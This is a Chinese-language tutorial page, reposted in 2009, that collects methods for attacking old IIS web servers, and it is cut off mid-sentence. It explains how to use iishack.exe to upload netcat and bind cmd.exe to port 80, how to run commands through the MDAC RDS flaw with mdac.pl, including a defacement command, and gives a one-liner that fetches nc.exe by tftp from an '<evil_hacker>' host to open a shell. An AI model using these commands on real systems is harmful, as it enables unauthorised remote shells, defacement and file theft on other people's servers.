当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > 有关IIS HACK的一些方法整理

安全防护
服务器安全设置(十六)
服务器安全设置(十七)
服务器安全设置(十八)
服务器安全设置(十九)
服务器安全设置(二十)
服务器安全设置(二十一)
服务器安全设置(二十二)
Windows Server 2003 虚拟主机的安全配置
Win2000 Server入侵监测
Web服务器的安全和攻击防范 (一)
Web服务器的安全和攻击防范 (二)
Web服务器的安全和攻击防范 (三)
Web服务器的安全和攻击防范 (四)
Web服务器的安全和攻击防范 (五)
安全配置和维护Apache WEB Server (上)
安全配置和维护Apache WEB Server (下)
安全性与IIS (一)
安全性与IIS (二)
安全性与IIS (三)
安全性与IIS (四)

安全防护 中的 有关IIS HACK的一些方法整理


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 51 ::
收藏到网摘: n/a

1,介绍

由于这些方法针对通过端口80来操作,所以具有一定的威胁性,因为作为WEB你这个口总要开的。如果你想一边抽烟一边查漏洞,OK,你下载一些CGI扫描器来帮助你检查,你可以尝试使用这两个:

"whisker" by "rain forest puppy" (www.wiretrip.net/rfp).
"cis" by "mnemonix" (www.cerberus-infosec.co.uk)

另外你如果要知道目标机器运行的是啥类型的服务程序,你可以使用下面的命令:

telnet <victim> 80
GET HEAD / HTTP/1.0

就可以返回一些名字和WEB服务程序版本,如果有些服务器把WEB运行在8080,81,8000,8001口,你就TELNET相应的口上。

如果你要知道运行了SSL的WEB服务程序,在WEB服务器和浏览器进行了连接的的话,我们就可以使用工具"ssleay":

s_client -connect <victim>:443
HEAD / HTTP /1.0

2,一些常用方法:

========IIS HACK==========
www.eeye.com的人员发现了一个IIS4.0的缓冲溢出可以允许用户上载程序,如netcat到目标服务器,并把cmd.exe绑定到80口。这个缓冲溢出主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求
没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序在系统中下载和执行程序。

要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器,当然你可以是虚拟服务器哦。

你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:
c:\>iishack.exe <victim> 80 <your web server>/ncx.exe
然后你就使用netcat来连接你要检测的服务器:
c:\>nc <victim> 80 
如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。

=========MDAC- 本地命令执行===========

你可能认为这个漏洞太老了,可网络如此之大,可能还有好多IIS WEB服务器存在这个漏洞啦。IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下,它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。关于这个漏洞的描述,很多文章介绍的很清楚,这里不做详细解释,你如果要对自己的站点进行检查是否存在这个漏洞,你可以通过下面的操作:

c:\>nc -nw -w 2 <victim> 80
GET /msadc/msadcs.dll HTTP

如果你得到下面的信息:

application/x_varg

就很有可能没有打上补丁并存在此漏洞,你可以使用rain forest puppy站上的两个程序进行测试(www.wiretrip.net/rfp)==>mdac.pl和msadc2.pl 。

c:\> mdac.pl -h <victim>
Please type the NT commandline you want to run (cmd /c 
assumed):\n
cmd /c

OK,如果你要替换对方的主页,你就可以使用下面的方法:

cmd/c echo hacked by me > 
d:\inetpub\wwwroot\victimweb\index.htm

或者其他命令,当然最好的方法我觉得还是使用上载我们的netcat,并把CMD.EXE绑定到端口80上,我们可以设置我们自己的TFTP服务程序并把nc.exe放上去,然后在执行命令,如:

cmd/c cd %systemroot%&&tftp -i <evil_hacker> GET 
nc.exe&&del ftptmp
&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe

然后你就连接到80口,得到一个SHELL口让你浏览。呵呵!


=========Codebrws.asp & Showcode.asp ==================

Codebrws.asp和Showcode.asp在IIS4.0中是附带的看文件的程序,但不是默认安装的,这个查看器是如果管理员允许查看样例文件作为联系而安装的,但是,这个查看器没有很好的限制所访问的文件,远程攻击者可以利用这个漏洞来查看目标机器上的任意文件内容,但要注意以下几点:
1,Codebrws.asp 和 Showcode.asp默认情况下没有安装。
2,漏洞仅允许查看文件内容。
3,这个漏洞不能绕过WINDOWS NT的ACL控制列表的限制。
4,只有同一分区下的文件可以被查看(所以把IIS目录和WINNT分区安装
是个不错的注意,也可能比较好的防止最新的IIS5.0的unicode漏洞).
5,攻击者需要知道请求的文件名。

例如你发现存在这个文件并符合